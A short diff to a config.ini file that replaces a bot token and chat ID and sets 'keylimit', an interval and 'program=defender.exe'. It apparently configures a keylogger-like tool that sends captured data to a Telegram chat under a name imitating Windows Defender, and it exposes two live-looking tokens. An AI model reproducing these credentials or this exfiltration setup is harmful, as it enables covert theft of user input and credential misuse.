--- a/config.ini
+++ b/config.ini
@@ -1,6 +1,6 @@
 [main]
-token=1135091247:AAHBn533Jx27qAsZHrIdpLrEMCciDHyM9Uc
-chatid=-1001120619561
+token=5023865420:AAEMazUzGdgPnVJXzeOeyLFKUnS36FC6mik
+chatid=1733877952
 interval=300
 keylimit=500
 program=defender.exe
